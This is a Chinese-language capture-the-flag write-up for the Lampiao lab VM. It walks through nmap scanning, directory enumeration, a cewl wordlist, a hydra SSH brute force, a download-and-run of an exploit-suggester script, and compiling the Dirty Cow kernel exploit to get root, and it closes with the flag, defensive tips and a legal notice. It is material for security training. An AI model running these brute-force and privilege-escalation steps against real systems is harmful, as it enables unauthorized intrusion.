Lampiao靶机渗透测试详细教程<\/h1>

1. 靶机信息<\/h2>
靶机名称：Lampiao<\/li>
难度等级：中等<\/li>
技术要点：信息收集、Web渗透、Drupal漏洞利用、SSH爆破、内核提权(Dirty Cow)<\/li>
测试环境：VMware虚拟机，Kali Linux作为攻击机<\/li> <\/ul>
2. 信息收集阶段<\/h2>

2.1 网络扫描<\/h3>
使用nmap进行主机发现：<\/p>
nmap -sP 192.168.111.0\/24
<\/span><\/span><\/code><\/pre>发现目标IP：192.168.111.129<\/p>
2.2 端口扫描与服务识别<\/h3>
全端口扫描：<\/p>
nmap -p- 192.168.111.129
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22\/tcp - SSH<\/li>
80\/tcp - HTTP<\/li>
1898\/tcp - HTTP<\/li>
<\/ul>
2.3 Web服务枚举<\/h3>
访问Web服务：<\/p>
http:\/\/192.168.111.129:1898\/
<\/code><\/pre>
发现两个重要资源：<\/p>

音频文件：http:\/\/192.168.111.129:1898\/audio.m4a<\/code>

播放后获得用户名：tiago<\/li>
<\/ul>
<\/li>
二维码图片：http:\/\/192.168.111.129:1898\/qrc.png<\/code>

扫描后无有效信息<\/li>
<\/ul>
<\/li>
<\/ol>
2.4 目录爆破<\/h3>
使用dirb进行目录枚举：<\/p>
dirb http:\/\/192.168.111.129:1898
<\/span><\/span><\/code><\/pre>发现重要文件：<\/p>

robots.txt<\/code><\/li>
CHANGELOG.txt<\/code><\/li>
<\/ul>
通过CHANGELOG.txt确认网站使用Drupal 7.54<\/p>
3. Web渗透阶段<\/h2>
3.1 密码字典生成<\/h3>
使用cewl爬取网站生成密码字典：<\/p>
cewl http:\/\/192.168.111.129:1898\/?q=<\/span>node\/1 -w dayu.txt
<\/span><\/span><\/code><\/pre>3.2 SSH爆破<\/h3>
使用hydra进行SSH爆破：<\/p>
hydra -l tiago -P dayu.txt 192.168.111.129 ssh
<\/span><\/span><\/code><\/pre>成功获取密码：Virgulino<\/p>
3.3 SSH登录<\/h3>
使用获取的凭据登录：<\/p>
ssh tiago@192.168.111.129
<\/span><\/span><\/code><\/pre>密码：Virgulino<\/p>
4. 权限提升阶段<\/h2>
4.1 系统信息收集<\/h3>
登录后检查用户权限和系统信息：<\/p>
id
<\/span><\/span>uname -a
<\/span><\/span><\/code><\/pre>确认当前为低权限用户，需要提权<\/p>
4.2 漏洞利用建议<\/h3>
下载linux-exploit-suggester脚本：<\/p>
wget https:\/\/raw.githubusercontent.com\/mzet-\/linux-exploit-suggester\/master\/linux-exploit-suggester.sh -O les.sh
<\/span><\/span><\/code><\/pre>(注意：如果网络受限，可使用代理或本地HTTP服务器)<\/p>
赋予执行权限并运行：<\/p>
chmod +x les.sh
<\/span><\/span>.\/les.sh
<\/span><\/span><\/code><\/pre>扫描结果显示存在Dirty Cow漏洞(CVE-2016-5195)<\/p>
4.3 Dirty Cow漏洞利用<\/h3>
搜索并下载40847漏洞利用代码：<\/p>
searchsploit dirty cow
<\/span><\/span><\/code><\/pre>或在线搜索"40847 exploit"<\/p>
编译漏洞利用代码：<\/p>
g++ -Wall -pedantic -O2 -std=<\/span>c++11 -pthread -o dcow 40847.cpp -lutil
<\/span><\/span><\/code><\/pre>执行后获得root权限，设置密码为"dirtyCowFun"<\/p>
4.4 Root登录<\/h3>
使用新密码通过SSH登录root账户：<\/p>
ssh root@192.168.111.129
<\/span><\/span><\/code><\/pre>密码：dirtyCowFun<\/p>
5. 获取Flag<\/h2>
在root目录下找到flag：<\/p>
9740616875908d91ddcdaa8aea3af366
<\/code><\/pre>
6. 技术要点总结<\/h2>

信息收集<\/strong>：全面的端口扫描和目录枚举是关键<\/li>
凭证获取<\/strong>：通过音频文件获取用户名，cewl生成字典，hydra爆破SSH<\/li>
漏洞利用<\/strong>：识别Drupal版本，利用已知漏洞<\/li>
权限提升<\/strong>：使用Dirty Cow漏洞进行内核提权<\/li>
代理使用<\/strong>：在受限网络环境下使用代理或本地HTTP服务器传输文件<\/li>
<\/ol>
7. 防御建议<\/h2>

及时更新系统和应用补丁<\/li>
使用强密码策略，避免密码重用<\/li>
限制SSH访问，使用密钥认证<\/li>
关闭不必要的服务和端口<\/li>
定期进行安全审计和漏洞扫描<\/li>
<\/ol>
注意：本教程仅用于合法授权的渗透测试和安全研究，未经授权对他人系统进行测试是违法行为。<\/p>